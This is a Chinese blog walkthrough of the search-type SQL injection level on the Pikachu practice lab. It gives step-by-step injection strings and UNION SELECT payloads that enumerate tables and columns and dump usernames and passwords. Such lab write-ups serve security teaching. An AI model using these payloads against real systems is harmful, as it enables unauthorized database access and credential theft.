Pikachu靶场-SQL注入-搜索型注入过关步骤
2023-06-13 09:16:06 时间
Pikachu靶场-SQL注入-搜索型注入过关步骤
首先要明白MySQL数据库模糊搜索的语句,like ‘常%’、like ‘%常’、like ‘%常%’ 这个几个,这里就不详说这个语句了
判断注入点
不知道怎么写的代码以下几种语句都可以试试
这关我用的搜索型注入语句: v%’ and -1=-1 – bbq
网上查到的搜索型注入语句: ‘and 1=1 and ‘%’=’
%’ and 1=1–’
%’ and 1=1 and ‘%’=’ 单引号闭合的时候报了一个错误,这说明大概是 %xx%、xx%吧
直接上过程动图吧,看不清点击图片放大查看:
判断有多少个字段数
这关有4个,直接上动图:
展示显错位
查询当前数据库
version()查看数据库版本 ,database()查看当前数据库
v%' union select version(),database(),33 -- bbq
查询出数据库中的所有表
如果表多页面展示不全,可以使用 LIMIT 一页页展示,也可以使用group_concat() 拼接函数将显示的字段名包起来展示
v%' union select table_name,22,33 from information_schema.tables where table_schema=database() -- bbq
查询指定的表中的列名
查询出表名下一步就是,查询字段也就是列名称
v%' union select column_name,22,33 from information_schema.columns where table_schema='pikachu' and table_name='users' -- bbq
查询数据
当经过以上步骤,已经知道了数据库名、表名、字段名,那么就可以查询我们需要的数据了
v%' union select username,password,33 from users -- bbq
相关文章
- python 爬虫 通过搜索引擎搜索好看的图片进行多线程高效率爬取(解决href关联问题)
- 【算法竞赛 - 搜索】Black And White
- 81. 搜索旋转排序数组 II
- 240. 搜索二维矩阵 II
- Linux find命令:根据路径和条件搜索指定文件
- 【生信教程】如何搜索高速下载一篇CancerCell文章中测序原始文件,B站有视频教程哦~
- 历经一个月,我做了一个前端面试题搜索公众号
- R语言Pearson相关性分析就业率和“性别平等”谷歌搜索热度google trend时间序列数据可视化
- 徐大大seo:2023年谷歌搜索优化的9个SEO趋势
- WordPress 文章查询教程11:如何使用搜索和评论相关参数
- SQL开发知识:Sql注入原理简介
- mysql用find_in_set代替like搜索提高性能详解数据库
- Lucene学习总结之七:Lucene搜索过程解析(4)详解架构师
- Linux下模糊搜索文件的有效利用(linux模糊搜索文件)
- 查询MySQL模糊查询:从表中搜索出结果(mysql模糊查询表)
- 搜索型MSSQL注入攻击安全防范技术(搜索型注入 mssql)
- SQL注入攻击对MSSQL的威胁及防护策略(sql注入 mssql)
- Mysql防注入攻击指南,保护您的数据库安全(mysql搜索注入)
- sql 注入MSSQL防止SQL注入:强力防护的关键步骤(mssql阻止)
- MSSQL实现SQL注入防护的完美解决方案(mssql 防sql注入)
- 敏感Oracle 关闭大小写敏感提升搜索效率(oracle 关闭大小写)
- Oracle数据库如何防范SQL注入(oracle会sql注入)